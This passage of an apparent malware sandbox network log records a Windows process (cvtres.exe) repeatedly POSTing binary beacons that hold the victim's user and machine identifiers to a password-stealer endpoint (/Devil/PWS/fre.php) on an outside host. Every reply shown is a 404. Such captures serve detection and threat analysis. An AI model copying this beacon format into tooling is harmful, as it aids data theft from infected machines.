                  60192.168.2.349881188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:50.015660048 CEST9837OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:50.032645941 CEST9837OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:50.116230011 CEST9838INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yYs5xGZmn0bbEItP9NqwtmTWoqccfvVeGOdajUor7qMWqijvuJJLkrQMHxpH8hh9w4yik0jbeNva2SzL%2FpuC12ECQYgANqYXeelmanIviQ3Pe3jNt%2BOhtQ1xoWS%2Bvw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e50059fa290a3-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  61192.168.2.349882188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:51.663594961 CEST9839OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:51.680593014 CEST9839OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:51.756084919 CEST9840INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=N7Z3F0l4w%2FyGCWf%2BXM%2BApLe4jGBa6XF%2FUnI1FFrvY7eYRDEMdMyPlNFbsT35j3%2FEqDNEMwT%2F1ao0H%2Br7Nhk1WJUkgVYyRYMHFXsgqbZQMRiG3YeVxGXyCoc%2BxQUsXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e500fe9db9b71-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  62192.168.2.349883188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:53.308239937 CEST9841OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:53.325928926 CEST9841OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:53.422276974 CEST9842INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6Fd17Zb%2BwPjA3E0zM9dfJ7XwwRlkas9438HGfYUUM0esuZPTVvVDG8CPTnIQGu3bO%2BbJasJNEsA4X1MXNU84ARiXnOa9ZuTJ06F2NFelnoaAx%2FZjEyhaBKlZ%2BrGLLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e501a3ea19c04-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  63192.168.2.349884188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:54.330408096 CEST9843OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:54.347251892 CEST9843OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:54.443857908 CEST9844INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=En0ibOgeEuMxY2mpHD2Dt3TdC47cwr0p%2B%2FkxieOBFGmpgV0W8IYvn3FdaUu5Dw3eYi89xBOfLEzFvGaVkysT4VQaqP1FJy4AkZCJvdsml9EBR6cH68soksbWjOz2PA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e50209b4692a5-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  64192.168.2.349885188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:55.376396894 CEST9845OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:55.394433975 CEST9845OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:55.477446079 CEST9846INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:55 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fRCqN%2B0U%2FIaJlKXxZ0j9RFyfBV2nGu%2Bs3z%2FsZN0sUZyIfeketjJylXcTToil1dlVsJcfYulWZ7AN3gENYb6%2FnTXhsn7WqZfUwLPIOGO3aDtBG%2FjPde0X6n6l2WwZjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e50272bba9060-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  65192.168.2.349887188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:58.405291080 CEST9855OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:58.422477961 CEST9855OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:58.521328926 CEST9856INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PSagRcg%2BXgMM8SLs1fz1sWSt3bmnwStUi%2B9W77wP9McJbCEncWHNRPxRcBP2MEeo4%2BG9DAV%2FyOHi%2Fg70bNZbQEebuoYORKyhvSDwkCg7bgb%2B5KBhVvZvlLt%2BS3qCOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e503a0f0c9b1f-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  66192.168.2.349888188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:44:00.133245945 CEST9857OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:44:00.150311947 CEST9857OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:44:00.224335909 CEST9858INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:44:00 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gCIohsXjHhgi0pQExP2v8aaRoEpTkgH8DUsDtSscarAKN6sCn7smeeWy9hlvBjh8%2BS%2BX1zapu%2B5%2BOZP8efkqrsyWJ3QvXrzyY9TiWrZ%2Fxe%2BhhcbnerbQyw2nP%2BtpFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e5044da06bba7-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  67192.168.2.349889188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:44:01.764744997 CEST9859OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:44:01.781905890 CEST9859OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:44:01.874361038 CEST9860INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:44:01 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pqVP65brrqjsnWByoTI7h%2Beihew4kemEjFaRp39wYal1iwPuhR1mCslnHhL%2BGO7wotp5gPYsoPk9QiiY2rKGIlyolfTNGFDDREhFvp96JrTmCIzOCv6%2Bf2d%2BAnEuOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e504f0ca29140-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  68192.168.2.349890188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:44:03.457386971 CEST9861OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:44:03.474813938 CEST9861OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:44:03.564661026 CEST9862INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:44:03 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UWOk8nrhWsKBKGWXSePgv8dtkyveOyzmxWIMZzvZ8izB2dT7YQLIajfAbJ7oAJ3TKxuCqWiHVj0DQF4T24Rpb8OGZKiBf8VDNmp0wuRdyBsttE%2FFj7le1FIprpYRXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e5059ae8c9018-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  69192.168.2.349892188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:44:04.916627884 CEST9866OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:44:04.933479071 CEST9867OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:44:05.023818016 CEST9867INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:44:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KlaIcUFq%2FAKMZr8cKuA7oS9%2F0E%2FRgGaKflZWBKkiJ9ilDyY1Sft%2FkwrTIkWCTxABLWGIMhtPPWfpGj4bz8E23nuql8Rm%2Bdzkjxh4tE3Ibkx0blidQFfJSr%2FOC%2F23lg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e5062ceb69128-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  7192.168.2.349749188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:20.745320082 CEST1039OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:20.762243032 CEST1039OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:20.839010000 CEST1040INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ut9B7mf4G17zu3N9HtfdKLQB4vnnYZyFkcj3DiKeaTp6lkOkH0%2BG1RXZfAd1eHXyrbhOy35lhzComx8GvR8btMp2ypwuCSvqRR%2BPT%2FdC4VdZgby%2Bxpk5t%2BA4Fic1SA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4dd7aae99225-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  70192.168.2.349895188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:44:06.157277107 CEST9877OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:44:06.174385071 CEST9877OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:44:06.249001026 CEST9878INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:44:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4dWgjRH38pyPZeD0qb0jk1%2F9qOz8xFjDAiF5Gi2i2AeNn31igXE4WwQOWYQHrpOyIGITs3%2Fzw1da6XTCKPX3NE8Mjee42nTkPpxBuY5u2IZKUgW5M0nLaa1piuJcXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e506a89e19271-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  71192.168.2.349896188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:44:07.789189100 CEST9879OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:44:07.806155920 CEST9879OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:44:07.921392918 CEST9880INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:44:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NwDeet%2BtDovGzYKRHtlc%2BIy9CvtPPAj%2FIhJEPstX1Ci1BEnwzlCsGh%2BuTY0Brr6ZBfTS8J8wHhv9vdUzelvtptMWlvXbpzGKUv3k3lh%2FjuysDwLv3KXOt2JS1GaA8w%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e5074b917bb5b-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  72192.168.2.349897188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:44:08.828123093 CEST9881OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:44:08.845298052 CEST9881OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:44:08.957175970 CEST9882INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:44:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c0pX9SJrHopzRCsEkDmDxwlNx0C41KoS8krJ5OgxEsOqET4277iXRW3J%2FWp2JHcXROzAxWooOe8cWiTJpbpDaNfjHGikivIw5A1OpyJxaquuggPEYvGU5TP02bgBIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e507b3f7b91d8-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  73192.168.2.349898188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:44:09.907279015 CEST9882OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
